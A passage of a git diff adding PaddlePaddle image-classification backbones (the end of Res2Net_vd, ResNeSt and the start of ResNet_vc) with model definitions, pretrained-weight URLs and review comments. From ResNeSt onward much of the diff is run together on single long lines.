            act=None,
            name=name + "_branch2c")

        if not shortcut:
            # vd shortcut: stride stays 1; spatial reduction happens via the
            # avg-pool inside ConvBNLayer when is_vd_mode is True.
            self.short = ConvBNLayer(
                num_channels=num_channels1,
                num_filters=num_channels2,
                filter_size=1,
                stride=1,
                is_vd_mode=False if if_first else True,
                name=name + "_branch1")

        self.shortcut = shortcut

    def forward(self, inputs):
        y = self.conv0(inputs)
        xs = paddle.split(y, self.scales, 1)
        ys = []
        # Hierarchical residual connections across the splits.
        for s, conv1 in enumerate(self.conv1_list):
            if s == 0 or self.stride == 2:
                ys.append(conv1(xs[s]))
            else:
                ys.append(conv1(xs[s] + ys[-1]))
        if self.stride == 1:
            ys.append(xs[-1])
        else:
            ys.append(self.pool2d_avg(xs[-1]))
        conv1 = paddle.concat(ys, axis=1)
        conv2 = self.conv2(conv1)

        if self.shortcut:
            short = inputs
        else:
            short = self.short(inputs)
        y = paddle.add(x=short, y=conv2)
        y = F.relu(y)
        return y


class Res2Net_vd(nn.Layer):
    """Res2Net-vd backbone: deep 3x3x3 stem ("vd") + 4 bottleneck stages.

    Args:
        layers: network depth, one of {50, 101, 152, 200}.
        scales: number of feature splits per bottleneck.
        width: base width per split.
        class_num: classifier output dimension.
    """

    def __init__(self, layers=50, scales=4, width=26, class_num=1000):
        super(Res2Net_vd, self).__init__()

        self.layers = layers
        self.scales = scales
        self.width = width
        basic_width = self.width * self.scales
        supported_layers = [50, 101, 152, 200]
        assert layers in supported_layers, \
            "supported layers are {} but input layer is {}".format(
                supported_layers, layers)

        if layers == 50:
            depth = [3, 4, 6, 3]
        elif layers == 101:
            depth = [3, 4, 23, 3]
        elif layers == 152:
            depth = [3, 8, 36, 3]
        elif layers == 200:
            depth = [3, 12, 48, 3]
        num_channels = [64, 256, 512, 1024]
        num_channels2 = [256, 512, 1024, 2048]
        num_filters = [basic_width * t for t in [1, 2, 4, 8]]

        # "vd" deep stem: three 3x3 convs replace the single 7x7 conv.
        self.conv1_1 = ConvBNLayer(
            num_channels=3,
            num_filters=32,
            filter_size=3,
            stride=2,
            act='relu',
            name="conv1_1")
        self.conv1_2 = ConvBNLayer(
            num_channels=32,
            num_filters=32,
            filter_size=3,
            stride=1,
            act='relu',
            name="conv1_2")
        self.conv1_3 = ConvBNLayer(
            num_channels=32,
            num_filters=64,
            filter_size=3,
            stride=1,
            act='relu',
            name="conv1_3")
        self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1)

        self.block_list = []
        for block in range(len(depth)):
            shortcut = False
            for i in range(depth[block]):
                # Deep stage-3 nets use numeric "res4b<N>" suffixes to avoid
                # running past 'z'; shallow ones use letter suffixes.
                if layers in [101, 152, 200] and block == 2:
                    if i == 0:
                        conv_name = "res" + str(block + 2) + "a"
                    else:
                        conv_name = "res" + str(block + 2) + "b" + str(i)
                else:
                    conv_name = "res" + str(block + 2) + chr(97 + i)
                bottleneck_block = self.add_sublayer(
                    'bb_%d_%d' % (block, i),
                    BottleneckBlock(
                        num_channels1=num_channels[block]
                        if i == 0 else num_channels2[block],
                        num_channels2=num_channels2[block],
                        num_filters=num_filters[block],
                        stride=2 if i == 0 and block != 0 else 1,
                        scales=scales,
                        shortcut=shortcut,
                        if_first=block == i == 0,
                        name=conv_name))
                self.block_list.append(bottleneck_block)
                shortcut = True

        self.pool2d_avg = AdaptiveAvgPool2D(1)

        self.pool2d_avg_channels = num_channels[-1] * 2

        stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0)

        self.out = Linear(
            self.pool2d_avg_channels,
            class_num,
            weight_attr=ParamAttr(
                initializer=Uniform(-stdv, stdv), name="fc_weights"),
            bias_attr=ParamAttr(name="fc_offset"))

    def forward(self, inputs):
        y = self.conv1_1(inputs)
        y = self.conv1_2(y)
        y = self.conv1_3(y)
        y = self.pool2d_max(y)
        for block in self.block_list:
            y = block(y)
        y = self.pool2d_avg(y)
        y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels])
        y = self.out(y)
        return y


def _load_pretrained(pretrained, model, model_url, use_ssld=False):
    """Load weights per `pretrained`: False = skip, True = download from
    `model_url`, str = local checkpoint path. Raises RuntimeError otherwise."""
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )


def Res2Net50_vd_26w_4s(pretrained=False, use_ssld=False, **kwargs):
    model = Res2Net_vd(layers=50, scales=4, width=26, **kwargs)
    _load_pretrained(
        pretrained,
        model,
        MODEL_URLS["Res2Net50_vd_26w_4s"],
        use_ssld=use_ssld)
    return model


def Res2Net101_vd_26w_4s(pretrained=False, use_ssld=False, **kwargs):
    model = Res2Net_vd(layers=101, scales=4, width=26, **kwargs)
    _load_pretrained(
        pretrained,
        model,
        MODEL_URLS["Res2Net101_vd_26w_4s"],
        use_ssld=use_ssld)
    return model


def Res2Net200_vd_26w_4s(pretrained=False, use_ssld=False, **kwargs):
    model = Res2Net_vd(layers=200, scales=4, width=26, **kwargs)
    _load_pretrained(
        pretrained,
        model,
        MODEL_URLS["Res2Net200_vd_26w_4s"],
        use_ssld=use_ssld)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnest.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnest.py
new file mode 100644
index 0000000..a414c29
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnest.py
@@ -0,0 +1,738 @@
# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import numpy as np
import paddle
import math
import paddle.nn as nn
import paddle.nn.functional as F
from paddle import ParamAttr
from paddle.nn.initializer import KaimingNormal
from paddle.nn import Conv2D, BatchNorm, Linear, Dropout
from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D
from paddle.regularizer import L2Decay

from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url

MODEL_URLS = {
    "ResNeSt50_fast_1s1x64d":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeSt50_fast_1s1x64d_pretrained.pdparams",
    "ResNeSt50":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeSt50_pretrained.pdparams",
    "ResNeSt101":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeSt101_pretrained.pdparams",
}

__all__ = list(MODEL_URLS.keys())


class ConvBNLayer(nn.Layer):
    """Conv2D + BatchNorm with zero L2 decay on BN scale/offset.

    Parameter names derived from `name` must match the released pretrained
    checkpoints — do not change the naming scheme.
    """

    def __init__(self,
                 num_channels,
                 num_filters,
                 filter_size,
                 stride=1,
                 dilation=1,
                 groups=1,
                 act=None,
                 name=None):
        super(ConvBNLayer, self).__init__()

        # BN parameters are excluded from weight decay.
        bn_decay = 0.0

        self._conv = Conv2D(
            in_channels=num_channels,
            out_channels=num_filters,
            kernel_size=filter_size,
            stride=stride,
            padding=(filter_size - 1) // 2,
            dilation=dilation,
            groups=groups,
            weight_attr=ParamAttr(name=name + "_weight"),
            bias_attr=False)
        self._batch_norm = BatchNorm(
            num_filters,
            act=act,
            param_attr=ParamAttr(
                name=name + "_scale", regularizer=L2Decay(bn_decay)),
            bias_attr=ParamAttr(
                name + "_offset", regularizer=L2Decay(bn_decay)),
            moving_mean_name=name + "_mean",
            moving_variance_name=name + "_variance")

    def forward(self, x):
        x = self._conv(x)
        x = self._batch_norm(x)
        return x


class rSoftmax(nn.Layer):
    """Radix-softmax from ResNeSt: softmax over the radix axis when radix > 1,
    plain sigmoid otherwise."""

    def __init__(self, radix, cardinality):
        super(rSoftmax, self).__init__()
        self.radix = radix
        self.cardinality = cardinality

    def forward(self, x):
        cardinality = self.cardinality
        radix = self.radix

        batch, r, h, w = x.shape
        if self.radix > 1:
            # Regroup channels as (cardinality, radix, rest) and softmax over
            # the radix axis, then flatten back to a per-channel gate.
            x = paddle.reshape(
                x=x,
                shape=[
                    batch, cardinality, radix,
                    int(r * h * w / cardinality / radix)
                ])
            x = paddle.transpose(x=x, perm=[0, 2, 1, 3])
            x = nn.functional.softmax(x, axis=1)
            x = paddle.reshape(x=x, shape=[batch, r * h * w, 1, 1])
        else:
            x = nn.functional.sigmoid(x)
        return x


class SplatConv(nn.Layer):
    """Split-Attention convolution: grouped conv producing `radix` feature
    groups, attention weights over the groups via rSoftmax, weighted sum."""

    def __init__(self,
                 in_channels,
                 channels,
                 kernel_size,
                 stride=1,
                 padding=0,
                 dilation=1,
                 groups=1,
                 bias=True,
                 radix=2,
                 reduction_factor=4,
                 rectify_avg=False,
                 name=None):
        super(SplatConv, self).__init__()

        self.radix = radix

        self.conv1 = ConvBNLayer(
            num_channels=in_channels,
            num_filters=channels * radix,
            filter_size=kernel_size,
            stride=stride,
            groups=groups * radix,
            act="relu",
            name=name + "_1_weights")

        self.avg_pool2d = AdaptiveAvgPool2D(1)

        # Bottleneck width for the attention MLP, floored at 32 channels.
        inter_channels = int(max(in_channels * radix // reduction_factor, 32))

        # to calc gap
        self.conv2 = ConvBNLayer(
            num_channels=channels,
            num_filters=inter_channels,
            filter_size=1,
            stride=1,
            groups=groups,
            act="relu",
            name=name + "_2_weights")

        # to calc atten
        self.conv3 = Conv2D(
            in_channels=inter_channels,
            out_channels=channels * radix,
            kernel_size=1,
            stride=1,
            padding=0,
            groups=groups,
            weight_attr=ParamAttr(
                name=name + "_weights", initializer=KaimingNormal()),
            bias_attr=False)

        self.rsoftmax = rSoftmax(radix=radix, cardinality=groups)

    def forward(self, x):
        x = self.conv1(x)

        # Global descriptor: sum over the radix splits, then GAP.
        if self.radix > 1:
            splited = paddle.split(x, num_or_sections=self.radix, axis=1)
            gap = paddle.add_n(splited)
        else:
            gap = x

        gap = self.avg_pool2d(gap)
        gap = self.conv2(gap)

        atten = self.conv3(gap)
        atten = self.rsoftmax(atten)

        if self.radix > 1:
            attens = paddle.split(atten, num_or_sections=self.radix, axis=1)
            y = paddle.add_n([
                paddle.multiply(split, att)
                for (att, split) in zip(attens, splited)
            ])
        else:
            y = paddle.multiply(x, atten)

        return y


class BottleneckBlock(nn.Layer):
    """ResNeSt bottleneck: 1x1 reduce, Split-Attention 3x3 (optionally with
    avg-pool downsampling before/after per `avd`/`avd_first`), 1x1 expand,
    and an optional avg-down projection shortcut."""

    def __init__(self,
                 inplanes,
                 planes,
                 stride=1,
                 radix=1,
                 cardinality=1,
                 bottleneck_width=64,
                 avd=False,
                 avd_first=False,
                 dilation=1,
                 is_first=False,
                 rectify_avg=False,
                 last_gamma=False,
                 avg_down=False,
                 name=None):
        super(BottleneckBlock, self).__init__()
        self.inplanes = inplanes
        self.planes = planes
        self.stride = stride
        self.radix = radix
        self.cardinality = cardinality
        self.avd = avd
        self.avd_first = avd_first
        self.dilation = dilation
        self.is_first = is_first
        self.rectify_avg = rectify_avg
        self.last_gamma = last_gamma
        self.avg_down = avg_down

        group_width = int(planes * (bottleneck_width / 64.)) * cardinality

        self.conv1 = ConvBNLayer(
            num_channels=self.inplanes,
            num_filters=group_width,
            filter_size=1,
            stride=1,
            groups=1,
            act="relu",
            name=name + "_conv1")

        if avd and avd_first and (stride > 1 or is_first):
            self.avg_pool2d_1 = AvgPool2D(
                kernel_size=3, stride=stride, padding=1)

        # NOTE(review): radix >= 1 is true for every provided configuration
        # (radix defaults to 1), so the plain-conv else branch appears to be
        # dead code — confirm whether radix=0 was ever intended.
        if radix >= 1:
            self.conv2 = SplatConv(
                in_channels=group_width,
                channels=group_width,
                kernel_size=3,
                stride=1,
                padding=dilation,
                dilation=dilation,
                groups=cardinality,
                bias=False,
                radix=radix,
                rectify_avg=rectify_avg,
                name=name + "_splat")
        else:
            self.conv2 = ConvBNLayer(
                num_channels=group_width,
                num_filters=group_width,
                filter_size=3,
                stride=1,
                dilation=dilation,
                groups=cardinality,
                act="relu",
                name=name + "_conv2")

        if avd and avd_first == False and (stride > 1 or is_first):
            self.avg_pool2d_2 = AvgPool2D(
                kernel_size=3, stride=stride, padding=1)

        self.conv3 = ConvBNLayer(
            num_channels=group_width,
            num_filters=planes * 4,
            filter_size=1,
            stride=1,
            groups=1,
            act=None,
            name=name + "_conv3")

        # Projection shortcut, needed when shape changes.
        if stride != 1 or self.inplanes != self.planes * 4:
            if avg_down:
                # "avg-down" shortcut: average pool then stride-1 1x1 conv.
                if dilation == 1:
                    self.avg_pool2d_3 = AvgPool2D(
                        kernel_size=stride, stride=stride, padding=0)
                else:
                    self.avg_pool2d_3 = AvgPool2D(
                        kernel_size=1, stride=1, padding=0, ceil_mode=True)

                self.conv4 = Conv2D(
                    in_channels=self.inplanes,
                    out_channels=planes * 4,
                    kernel_size=1,
                    stride=1,
                    padding=0,
                    groups=1,
                    weight_attr=ParamAttr(
                        name=name + "_weights", initializer=KaimingNormal()),
                    bias_attr=False)
            else:
                self.conv4 = Conv2D(
                    in_channels=self.inplanes,
                    out_channels=planes * 4,
                    kernel_size=1,
                    stride=stride,
                    padding=0,
                    groups=1,
                    weight_attr=ParamAttr(
                        name=name + "_shortcut_weights",
                        initializer=KaimingNormal()),
                    bias_attr=False)

            bn_decay = 0.0
            self._batch_norm = BatchNorm(
                planes * 4,
                act=None,
                param_attr=ParamAttr(
                    name=name + "_shortcut_scale",
                    regularizer=L2Decay(bn_decay)),
                bias_attr=ParamAttr(
                    name + "_shortcut_offset", regularizer=L2Decay(bn_decay)),
                moving_mean_name=name + "_shortcut_mean",
                moving_variance_name=name + "_shortcut_variance")

    def forward(self, x):
        short = x

        x = self.conv1(x)
        if self.avd and self.avd_first and (self.stride > 1 or self.is_first):
            x = self.avg_pool2d_1(x)

        x = self.conv2(x)

        if self.avd and self.avd_first == False and (self.stride > 1 or
                                                     self.is_first):
            x = self.avg_pool2d_2(x)

        x = self.conv3(x)

        if self.stride != 1 or self.inplanes != self.planes * 4:
            if self.avg_down:
                short = self.avg_pool2d_3(short)

            short = self.conv4(short)

            short = self._batch_norm(short)

        y = paddle.add(x=short, y=x)
        y = F.relu(y)
        return y


class ResNeStLayer(nn.Layer):
    """One ResNeSt stage: a (possibly downsampling) first BottleneckBlock
    followed by `blocks - 1` stride-1 blocks at the stage's dilation."""

    def __init__(self,
                 inplanes,
                 planes,
                 blocks,
                 radix,
                 cardinality,
                 bottleneck_width,
                 avg_down,
                 avd,
                 avd_first,
                 rectify_avg,
                 last_gamma,
                 stride=1,
                 dilation=1,
                 is_first=True,
                 name=None):
        super(ResNeStLayer, self).__init__()
        self.inplanes = inplanes
        self.planes = planes
        self.blocks = blocks
        self.radix = radix
        self.cardinality = cardinality
        self.bottleneck_width = bottleneck_width
        self.avg_down = avg_down
        self.avd = avd
        self.avd_first = avd_first
        self.rectify_avg = rectify_avg
        self.last_gamma = last_gamma
        self.is_first = is_first

        # The first block of the stage uses dilation 1 (or 2 when the stage
        # dilation is 4) and performs any stride/shape change.
        if dilation == 1 or dilation == 2:
            bottleneck_func = self.add_sublayer(
                name + "_bottleneck_0",
                BottleneckBlock(
                    inplanes=self.inplanes,
                    planes=planes,
                    stride=stride,
                    radix=radix,
                    cardinality=cardinality,
                    bottleneck_width=bottleneck_width,
                    avg_down=self.avg_down,
                    avd=avd,
                    avd_first=avd_first,
                    dilation=1,
                    is_first=is_first,
                    rectify_avg=rectify_avg,
                    last_gamma=last_gamma,
                    name=name + "_bottleneck_0"))
        elif dilation == 4:
            bottleneck_func = self.add_sublayer(
                name + "_bottleneck_0",
                BottleneckBlock(
                    inplanes=self.inplanes,
                    planes=planes,
                    stride=stride,
                    radix=radix,
                    cardinality=cardinality,
                    bottleneck_width=bottleneck_width,
                    avg_down=self.avg_down,
                    avd=avd,
                    avd_first=avd_first,
                    dilation=2,
                    is_first=is_first,
                    rectify_avg=rectify_avg,
                    last_gamma=last_gamma,
                    name=name + "_bottleneck_0"))
        else:
            raise RuntimeError("=>unknown dilation size")

        self.inplanes = planes * 4
        self.bottleneck_block_list = [bottleneck_func]
        for i in range(1, blocks):
            curr_name = name + "_bottleneck_" + str(i)

            bottleneck_func = self.add_sublayer(
                curr_name,
                BottleneckBlock(
                    inplanes=self.inplanes,
                    planes=planes,
                    radix=radix,
                    cardinality=cardinality,
                    bottleneck_width=bottleneck_width,
                    avg_down=self.avg_down,
                    avd=avd,
                    avd_first=avd_first,
                    dilation=dilation,
                    rectify_avg=rectify_avg,
                    last_gamma=last_gamma,
                    name=curr_name))
            self.bottleneck_block_list.append(bottleneck_func)

    def forward(self, x):
        for bottleneck_block in self.bottleneck_block_list:
            x = bottleneck_block(x)
        return x


class ResNeSt(nn.Layer):
    def __init__(self,
                 layers,
                 radix=1,
                 groups=1,
                 bottleneck_width=64,
                 dilated=False,
                 dilation=1,
                 deep_stem=False,
                 stem_width=64,
                 avg_down=False,
                 rectify_avg=False,
                 avd=False,
+        # NOTE(review): remaining ResNeSt.__init__ kwargs follow. deep_stem=True swaps the single 7x7 stem conv for three 3x3 ConvBNLayers; layer3/layer4 stride vs. dilation is selected by `dilated`/`dilation` below (dilated output stride 8/16, otherwise plain stride-2 stages).
avd_first=False, + final_drop=0.0, + last_gamma=False, + class_num=1000): + super(ResNeSt, self).__init__() + + self.cardinality = groups + self.bottleneck_width = bottleneck_width + # ResNet-D params + self.inplanes = stem_width * 2 if deep_stem else 64 + self.avg_down = avg_down + self.last_gamma = last_gamma + # ResNeSt params + self.radix = radix + self.avd = avd + self.avd_first = avd_first + + self.deep_stem = deep_stem + self.stem_width = stem_width + self.layers = layers + self.final_drop = final_drop + self.dilated = dilated + self.dilation = dilation + + self.rectify_avg = rectify_avg + + if self.deep_stem: + self.stem = nn.Sequential( + ("conv1", ConvBNLayer( + num_channels=3, + num_filters=stem_width, + filter_size=3, + stride=2, + act="relu", + name="conv1")), ("conv2", ConvBNLayer( + num_channels=stem_width, + num_filters=stem_width, + filter_size=3, + stride=1, + act="relu", + name="conv2")), ("conv3", ConvBNLayer( + num_channels=stem_width, + num_filters=stem_width * 2, + filter_size=3, + stride=1, + act="relu", + name="conv3"))) + else: + self.stem = ConvBNLayer( + num_channels=3, + num_filters=stem_width, + filter_size=7, + stride=2, + act="relu", + name="conv1") + + self.max_pool2d = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.layer1 = ResNeStLayer( + inplanes=self.stem_width * 2 + if self.deep_stem else self.stem_width, + planes=64, + blocks=self.layers[0], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=1, + dilation=1, + is_first=False, + name="layer1") + + # return + + self.layer2 = ResNeStLayer( + inplanes=256, + planes=128, + blocks=self.layers[1], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=2, + name="layer2") + + if 
self.dilated or self.dilation == 4: + self.layer3 = ResNeStLayer( + inplanes=512, + planes=256, + blocks=self.layers[2], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=1, + dilation=2, + name="layer3") + self.layer4 = ResNeStLayer( + inplanes=1024, + planes=512, + blocks=self.layers[3], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=1, + dilation=4, + name="layer4") + elif self.dilation == 2: + self.layer3 = ResNeStLayer( + inplanes=512, + planes=256, + blocks=self.layers[2], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=2, + dilation=1, + name="layer3") + self.layer4 = ResNeStLayer( + inplanes=1024, + planes=512, + blocks=self.layers[3], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=1, + dilation=2, + name="layer4") + else: + self.layer3 = ResNeStLayer( + inplanes=512, + planes=256, + blocks=self.layers[2], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=2, + name="layer3") + self.layer4 = ResNeStLayer( + inplanes=1024, + planes=512, + blocks=self.layers[3], + radix=radix, + cardinality=self.cardinality, + bottleneck_width=bottleneck_width, + avg_down=self.avg_down, + avd=avd, + avd_first=avd_first, + rectify_avg=rectify_avg, + last_gamma=last_gamma, + stride=2, + name="layer4") + + 
+        # NOTE(review): classification head below — AdaptiveAvgPool2D(1) to 2048 channels, then Linear(2048, class_num) initialized Uniform(-stdv, stdv) with stdv = 1/sqrt(2048). `final_drop` is stored in __init__ but no Dropout layer is built from it — presumably dead; confirm against upstream PaddleClas before relying on it.
self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.out_channels = 2048 + + stdv = 1.0 / math.sqrt(self.out_channels * 1.0) + + self.out = Linear( + self.out_channels, + class_num, + weight_attr=ParamAttr( + initializer=nn.initializer.Uniform(-stdv, stdv), + name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, x): + x = self.stem(x) + x = self.max_pool2d(x) + x = self.layer1(x) + x = self.layer2(x) + + x = self.layer3(x) + + x = self.layer4(x) + x = self.pool2d_avg(x) + x = paddle.reshape(x, shape=[-1, self.out_channels]) + x = self.out(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ResNeSt50_fast_1s1x64d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeSt( + layers=[3, 4, 6, 3], + radix=1, + groups=1, + bottleneck_width=64, + deep_stem=True, + stem_width=32, + avg_down=True, + avd=True, + avd_first=True, + final_drop=0.0, + **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeSt50_fast_1s1x64d"], + use_ssld=use_ssld) + return model + + +def ResNeSt50(pretrained=False, use_ssld=False, **kwargs): + model = ResNeSt( + layers=[3, 4, 6, 3], + radix=2, + groups=1, + bottleneck_width=64, + deep_stem=True, + stem_width=32, + avg_down=True, + avd=True, + avd_first=False, + final_drop=0.0, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeSt50"], use_ssld=use_ssld) + return model + + +def ResNeSt101(pretrained=False, use_ssld=False, **kwargs): + model = ResNeSt( + layers=[3, 4, 23, 3], + radix=2, + groups=1, + bottleneck_width=64, + deep_stem=True, + stem_width=64, + avg_down=True, + avd=True, + avd_first=False, + final_drop=0.0, + 
**kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeSt101"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnet_vc.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnet_vc.py new file mode 100644 index 0000000..6b972dc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnet_vc.py @@ -0,0 +1,309 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# NOTE(review): resnet_vc.py — ResNet "vc" variant: the 7x7 stem conv is replaced by three 3x3 convs (conv1_1/conv1_2/conv1_3). Only ResNet50_vc has a pretrained URL exported in MODEL_URLS, although ResNet_vc itself accepts layers in {18, 34, 50, 101, 152}.
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ResNet50_vc": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNet50_vc_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + name=None): + super(BottleneckBlock, self).__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + stride=stride, + act='relu', + name=name + "_branch2b") + 
self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 4, + filter_size=1, + act=None, + name=name + "_branch2c") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 4, + filter_size=1, + stride=stride, + name=name + "_branch1") + + self.shortcut = shortcut + + self._num_channels_out = num_filters * 4 + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class BasicBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + name=None): + super(BasicBlock, self).__init__() + self.stride = stride + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=3, + stride=stride, + act='relu', + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + act=None, + name=name + "_branch2b") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + stride=stride, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=conv1) + y = F.relu(y) + return y + + +class ResNet_vc(nn.Layer): + def __init__(self, layers=50, class_num=1000): + super(ResNet_vc, self).__init__() + + self.layers = layers + supported_layers = [18, 34, 50, 101, 152] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + + if layers == 18: + depth = [2, 2, 2, 2] + elif layers == 34 or layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif 
layers == 152: + depth = [3, 8, 36, 3] + num_channels = [64, 256, 512, + 1024] if layers >= 50 else [64, 64, 128, 256] + num_filters = [64, 128, 256, 512] + + self.conv1_1 = ConvBNLayer( + num_channels=3, + num_filters=32, + filter_size=3, + stride=2, + act='relu', + name="conv1_1") + self.conv1_2 = ConvBNLayer( + num_channels=32, + num_filters=32, + filter_size=3, + stride=1, + act='relu', + name="conv1_2") + self.conv1_3 = ConvBNLayer( + num_channels=32, + num_filters=64, + filter_size=3, + stride=1, + act='relu', + name="conv1_3") + + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + if layers >= 50: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block] * 4, + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + name=conv_name)) + self.block_list.append(bottleneck_block) + shortcut = True + else: 